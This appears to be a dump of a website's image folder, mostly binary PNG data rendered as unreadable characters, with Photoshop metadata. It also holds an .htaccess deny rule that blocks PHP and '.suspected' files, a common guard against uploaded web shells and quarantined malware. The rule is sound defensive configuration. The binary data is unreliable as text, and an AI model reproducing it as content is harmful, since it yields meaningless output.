閔sK���c �[�C6�/�ɕ��9c�	��ÇȨd*%����l�G�ơf����aJ?�[��fMU�v�䳢�0T���J�A%G�ڈ�m�:�0>�_F�0�#JO6:��^ڳtƀ�)Ul��=�&Eև�w�%姱>yjx�����Fy���j��}Mן�Ld������c�����x��^̑R�D6e8�	v7��P���dm2�k5��%�.�@�bsy%k�}$s�Uľ�<df�e���@~{��M�7�H���t.Sn,Ǒln�@�:��bF]0Ym�N�Αp8��F]����J]�k�Ԓ��e&�m�j�����hVt���ٗ�d8
ᇆ�8.컣U����/���~����/~[�9??^��?������=��W���gAJ�*�>�~�J���X�.��"T���O�r��V0OP�$a�Bg�՘�(R��0
җAG�Y��A��
����f�')
@x�^�ӐҶ=���/��j����a�4H٠u#^�8y��m���h����c>��yⶄ��Dћ����y�`z
=���i��ɱP2,E�˭I��5��<�x]&��8�cs?�����^J�2+@�=/�m��ij�un�٭���RX�3^5_̤�!O�"q�;*���E1;�7'��~Q\��٩�1{��;�\i�
"����g	~G�R+�Ԍ:я�L%�:eZ~#�����'xL����8a��0����)о�K��(��qM��i
�܆�gA��o-�ׅK��=x�;{����������U9Ķ&�%67��ua�t�>��=�v���S���1C�q���W��q�`�T�sa��j'-�#���Vf�������	�VU��&�>fg'�u7�1v}��)�++o�
���#����ٻ���5e����pu�z"��aP��A|�G�1ʭ^��h�A�PXZH�e���J�y�E�$��Z��u���ݥw�������=1:�4lTC}l\�jpq%��VRd(�9
�MJ��=��H�.DX,�q� �s�6e�޺ָWh�I�є�&��8��j$��g�r�.~�IF�H���tكY�߬f*	:�dL;
��PB��"]�7�N���)4�,L}��g��^{C�I��`]���YL�.=���LylʐlR�,M@���6�T�r�/����4MQC�hE#�V"s#�z��6�#R*�I���h�*9~�
!�IqD-U4��q�-8����2�}{��V���'���;"��DO�1G�;�]hD�*�P�M�y_=��������P��Z5,�)����I!GLA�2�lid��
�p�w($�^*���r�Z�����E
��}�īa�$��gO#�h<3p�����"J�C�7��,	Nc����}��_��~�S$��?�
��ſ|�ƽʓ�ה�x�U�h"M�R�����S�K$���<�;�4,X����V`񍓓��:Wo���k�$�Io���O�pQ7�&�+�UƘ"�#�p���6�0�� �^��IM���DR�WʄT$���*{�#�A���u�V
�Ii'8,�€�A�VkT
ԡ:x��\+ʞdG�/���8�T�R��
��'�(�Y:��{�����tn&�_J%Ӂ�����E�i^@J�db��wO��P���{������o��H�p��!��u%����tz��J��e<ߠ˜�|�A�G-��	��� +
�U��<�˼J���pV�1�:f��rX�Q��U�V?�_��J{1T]w�����yU�C:E��y��/�p���N�w�k��w�ʁnز�E
b�.חZ����B��Piw�ჳ´*��^�^�h���
+b]�4��-9B��',��_z%�Z���2��DCs���M�R��un��07�<���Ft=���{;9wΌ��Y-�~�圁�yP�A���,��t��];������K%�&W�w���'��8��)4�d��9�:Kƫc�j@�a2ن��R�V}�Mgni�nw<x����Oo�n�J}����N�\]'��N�E��O?=K��iD�`�ҫ����eѦ�N�ܧ�j���K0_��n���6��j�?���C8,���鍛邋�9��Ѣ~���f����'?��W^�q��<=�YZ���lV饠v��߅h�ݸ���99}����c�g�>JJ��M��v�r�Sڈ��O��?���b�놇�o+S=�/ʲ��͟8=9=]�����J��?��z)$`�3���ᦔ�L�R���-�黆�d��Κ�L�[�6�~�M��T=yT1Ā�-`�yU�I�����I��g9��@j�}!-f��lR(����bytt4;J�EuG:@��(0��)e٧7l�-t56�@
j"K��rG�d	V��z�L��X�%n�Qy���*FCU�t8R�փ�W)>\tiY
��H:��g}
���duI�U��+����~��'�J�g�`�ͦ}���z�?��W�iS%��8�uVIGZ�G�r?�C���!�+��q���aSճ�~��ͳ7�n��yٵ]���K��v)4L��"�'A�{G��x#Iސ�t�
�8��~�����?���Er�Er&�PBR4�Ogd��4nŤ�oء�|:�نcZ(N']N2����/�j�k���'�R�Hk]�^t�������l.��}�5����'��W�U�-�"q���#�9{��aw|�_}�7��`�X�;y��|绾�ζ�|�S��K��E=���x�𪨫ⸯ��'�.��Ez�HN/�"@�+@�y5��G���ާs��Q��Ë���O��/����g��=����ͳ������>���o�}�ͷ�����;e
��n�-ST7<xt����g~����'>���1�K:}2^)uo�9q�K�i�����xӥ��KV>|��W6�5!EB���߼JH���_�B��|۟�������?�CϿ��tM���|�3O�R$Ya(ӛ�Z�l��b��}�W��Ͼ��ˏ����hu#�y2���f���z� �p~�~��/��(�)0-H'�ݿ߾z���խ��:-��g���{�W�����X�>}Cg)::
��Uq��a�:>i��ӗ^y�?��+/�p�oz��ǎO�>t����,���賟��ݏ~�����mw���
���p���/�����j�<<��7�-���?��K��N�޾����j��u��#o�_��f��Z�ܘ=����f�{w����q,ʗu�}�>�ݡ���z���|u�߿��sϬ�v�Į���6��ɐ����m7�ͯMs8o��}:V�ϖu�ֱ���ڴΧZ�1�tk��!�֏.�W/o��zĪ����>���I|��Y?����7���߽����a�ּz����^}���ۏ����ᲩW�W��-��e~���W���꬘e^�,&�W��nq�v�����/U�?x����?��OOO��4���ض�0�c;��$��5i�&�.4k��hLڥ]lELP����H���i/\��x@�ĸj��������^�eY��=vǎ�'����1KG�%>������V�F�܆�)����eu�d�y� �s�R��/\�b
�x���=r�X4�����l;�yM�k�/���E����C�2�|t�U��������A�Hq>��x�t*/�r�L˒ ����"\��l���Ǻ˂���-��z@��D�S}�fM3UE��i�A,�TIV�� �2t5��$ê+�Tz9�I���>���C����D�����l	
Be,�2Hʬ�����,�gVE)���L<���}�=Ѡ�*���nT���]�p�E�"eYь�?:���Y�o��;yfd�s��U��K/v�=lM�S����D-+�F�>�T��C'J%ɀ�S���<
�7c��P���US��*8�%�T����L��k62 mE��>� �
�3�7L�	Q�bQ��e��j��{د
�9��7א����'�f���3sw��Ҹ>�gM�4
��o\۾�FF^��dz�D{Œ\b��۩�&&%���J�mҰ�aClK��
�2� �܋K{�}��ٹ����W�ɪ�M艃8����ܜ
W��G�.d$�~�E��h�]_����.~v4Ⱥ�ղL+�_X\��_�,���cWJ�P�|fh0��~rrB���XA,7vb@wp�>f��_��<׵��&o����K�;�������ť%
w`�]��X~�3�y�-f^(���~�J}�����#�N��=���j�Hy+ˮ!ʽ,��ӳ�++9��`(Ď����ϿTl���;}ڇSY���S7K��y<�in��!@��@?�ګ���窥"����H�g�ŕx<�Oݺ]��$����d�Fc3��֞�ԉ�.��M��e��RF��tH�T
::O$���@����ǼG��	�jŬ
9��t�{��
3�<?r:4?��萻w�:�v� ��)��>7;+E#sOO�H��]�����>ͷ��!:2��SO��v��}L t[=j�V!P�S�~2����Cw��
�,,�~m�V�
����۽�LBj�#��p��l�"K'���m�vw���P�~B�D�,N������
��},�f���5$IR��� �+�7��e�׫�*�|�Ӭ��,�
�^�����8��IH�:,@@v�lR[�_7�V��C��w��u�j�װ}�e4�y��X��΂R>�V�ˡ[�}�V�a��
ȸ j:d��nם�V�S/�#ڌx��f:��j4i��}��y+[�s'("@���e6ijbG{'u�9ޱ���D>W�w���y{��Ҳx���Vp��!����&čZ�t�=@.��Ǐ�{;Ca��rY6��|���7� �&��ǂ�)u�U��饯��L���i�D.�BN��}�F���
� )
0SEk<����1��
E�IEND�B`�images/04/.htaccess000044400000000424152434416630010040 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/04/upload.png000060400000004460152434416630010236 0ustar00�PNG


IHDR-,�F1?tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:5D587A4B365711E3947C974488EB60D0" xmpMM:DocumentID="xmp.did:5D587A4C365711E3947C974488EB60D0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5D587A49365711E3947C974488EB60D0" stRef:documentID="xmp.did:5D587A4A365711E3947C974488EB60D0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>5��IDATx�̙MH$Wǫ{ZGE��$D�����ue����Bb�e	��K��,9y��u9���p]u5*���?"DQ��~χө��~mOO��$�v���~��U׫�WO�u�d���|�߰|��K��kg,K,?�<ijj��EB3�㼼����ʨ���rrrHUU߈///)����mooS4���2�'&&1h������UQ�W!�`�\q���tqq�Iss�o��xann�qEE�x��)G���
З�8E8�Q��|T5���D\�Vj6�艧=VE��s���sww�>�@�l3#�⧖��Hx��A�=�
�&ۛ��0�c��rС�d
Yڋ�3�ir$d��MѴnc�
pM^��6v/422B��z
Z]]M�--�1�u�u�Q�=}�90���2
'A�E�I�����YlnmQaaa��%��i"��M���x���m�k�FX-@�9Ӧ�i�{{7���C��|����������
�o���RMM��26�$�m������?���r���֭��..-Q��oee�iZ��iJ��?S����e�u������q��z�� 5,��9��FBBxj!�p�q@�����[$�������^�H$E�{]�iW�*�u��t�����.����^�Zy��kk43;k�b�{���y��	��2��nJ�i��r�ZcC���D�����t�+܃U��А��;��t||Lk<{�/>L?�l_Aj�*��B�hn�s�R��'vvv&�F}��m�������h�}��%�UhIa�]:�'�H�aI������>go3��u����M�l)�*WIf�Ť�
r]L�������`&�)�t����ê������˗���GGi�ի��{�8���"3��$�t<[�g��(C�u��+��7�裻w�~]�9Rr�vt���F��t]-�� �$�j;������2�:OW.~Z����ba^�LLNz��r��jJ��bSS�{]irZ\�t�<�c&T`��k��)��#�=2�<��󚞛M;i[��hUUU��+%"�m�����a�ȶ�6�ؙ�mZ�܁F˽{�����ص��q�)����i�f������(�����
�C�I��k�^US#�W|�0��L�g��=b����CkF��{U.l(�3W$�Ҧ�H���Sw��aUh?��&6Ԧ��đ�b��899��1*:Fu9����j��,@�N#������T)a�Q�P�f��h2�[$�7v���8����$Ҍ�"�w�d=�0
@njM����ňؒ�B�X����R��
X�#z�i�D<j�l
����Ws󳷷�[���"h��t���+ۈ��lh������=ք��ߣ�6�g��f��McY��/,O�,m�+�d쌋��SIEND�B`�images/page_down_hover.png000060400000003233152434416630011672 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:8E2555228F7C11E596A7960DE0FD6D6E" xmpMM:InstanceID="xmp.iid:8E2555218F7C11E596A7960DE0FD6D6E" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>OPr�IDATx�bܸ8�X����?e�
��#\���_�����������ጌ,����D
3H���lqV~��L��,���^�( ��p��l#�42s01�II�X$����ߟ�n΅
��>�m@ ������&a1�b��q���/\����|{�p3##3Bы;+@����_�赿���hg#\���
 �_̌�S�ϟ/ҚiL,�o-za�}_�R������33\ �;��X�����S`�10��C���v��?��"���?�>�^���������L�l"?���'�#+0� �����fd`�v���(�0���.&�'W�21��]��?0�����/��:�ϟor��}�f甄��o��9^���S����o��0<����W|!���
�50��A��@
��a����0E2�9�z&`<�����ߟ�B7���O��f|"�/n/?L#0B�X���d409|��W
ywٿ�!��#F`eF�C����Z����_I�@�X��4��|��$q�y����'UFxy���@e�tĄn
�������wS��
�q�������	�r`���g�:���_�����.�Y@���!I9o`(��
�y����g�l<��΂=��Y�?�>���1.>�???���
��@y�?���b3�ϯϡ�֩V�+��2�IEND�B`�images/verified.png000060400000002235152434416630010322 0ustar00�PNG


IHDR�atEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:80FD3203E3B411E2B30AA7F8FF0264DD" xmpMM:DocumentID="xmp.did:80FD3204E3B411E2B30AA7F8FF0264DD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:80FD3201E3B411E2B30AA7F8FF0264DD" stRef:documentID="xmp.did:80FD3202E3B411E2B30AA7F8FF0264DD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���)IDATx�b�]��@&�b&25��~ �%ǀz ��,@��T������,�x�����
 fC� ր> �C�ĝ��q0��)���`�z��@��7�x!� ���j �� �] >�3�X��������4o� ��IJhN�b	 nF;��Ța,��b)�8�b(��7�Ѕ��'��
��?R���_ ��'آ=&q<T��A\�-,�\(�<��K ,8ħCv��g@�j�+��eOIEND�B`�images/button31.png000060400000005305152434416630010205 0ustar00�PNG


IHDR�t�
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs��~�4IDATx�c�>/t##�`���\ `ad�+a�+�-�Ā�P�#�EP�V���z��jIEND�B`�images/lic_minus.png000060400000002403152434416630010504 0ustar00�PNG


IHDR�JL�tEXtSoftwareAdobe ImageReadyq�e<�IDATxڤ�oLZW��Q�B�%U*�h���jݦ�حmjgɲdjc�,i�|��1��L����Ҥ-��uI���q]4��q[g*BUD����v.y�Px8۝��}����\�$It�LMM���HD��d�b��5�!:��@ûsA(233O����4
����G�'�5���V���yl2@5q8�T*%$	���N2�0�ݎL&��vvv�ttt쥂���w���"�\����3$�Z__G������ݑ�����d��{�B�Oл
@��`8��lz�,	Ƣ lP��d���`�DH�T�!�_�������Ӣ$ɚ������`�����x�X�M:��:_ZZ�d8s�F�㊊o�VV���m�p���[~�~�|�zQQ������EA�̏�b1��$Ы���wůM}�����͛�n�xQ�Z��,��4*,,$ �#�!�����\�P���s`m{������CC&[Z���]�X��h�����*�@,��#��ѓ2���M\�z *��D�+,|��ݻ#�v��edd𛛛��=�q�\F�����444"��M���ixRՃxR�U���p�J�`��{����)�=b㸦���J�J���x^z������)��-� p���GP�~ܿRɡ��zy�VU��͊���o߮�9Ke����^0V$r��n��&��F��X����S��8t���Ư\�
��	rppr������p0wp�Z�	N�Tj���?�86�����2y�ڗL�@6��в��lnnF�c�X��?� �&�n���OӣG#�ț�e���jE���=7�̒m�׻����*niy~����x�ި���I��Ϟul��(�ti.���t���m���_8�4(ڽ�Zm.4�����L�����͡������?`)@âu���f��ߟ�6����{Ap藖���O���5�V��MB�!��ggg���z'�s���x����K�Ȥ�G�`�N�
�*h��5e�pIAF�����z���uv��I�4���WXVV�9�Ks���}9�y�|t�I�yqqq���o��"�a��P0�a����J�����p�a�$p��[k���Nj�0�#L���-ڻ�7�IjSz�ȑ׭���B2�x��_��C��XHsIEND�B`�images/up.png000060400000046651152434416630007163 0ustar00�PNG


IHDR��R	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�@�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-20T13:09:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-20T15:45:05+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-20T15:45:05+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:09542d97-8f71-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:38d679da-8f68-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:5dfd2cff-8f74-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:8e3a214f-8f73-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:8fb5b417-8f70-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:9e542de9-8f73-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:a2f84fe0-8f71-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:b32790cc-8f68-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:b346ee9f-8f70-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:bfb95827-8f68-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>xmp.did:207A2A028ED511E59E31AD700287C36D</rdf:li>
               <rdf:li>xmp.did:278A62E98ED511E58E97963F18B52A94</rdf:li>
               <rdf:li>xmp.did:7666621B8EAD11E5B311FE3B750CF709</rdf:li>
               <rdf:li>xmp.did:8DE1DF2D8ED611E596B0B1168CB967CD</rdf:li>
               <rdf:li>xmp.did:B17B21968F6111E5B217C3E55942F08F</rdf:li>
               <rdf:li>xmp.did:F827112B8ED511E5B4FECF7614BCA1A9</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:9852ff0f-0d87-cc45-ab70-bf460a65a4c8</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:0c10aadf-62e5-b94a-998a-6c4e30e03df0</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:0c10aadf-62e5-b94a-998a-6c4e30e03df0</stEvt:instanceID>
                  <stEvt:when>2015-11-20T13:09:21+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:9852ff0f-0d87-cc45-ab70-bf460a65a4c8</stEvt:instanceID>
                  <stEvt:when>2015-11-20T15:45:05+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>23</exif:PixelXDimension>
         <exif:PixelYDimension>22</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
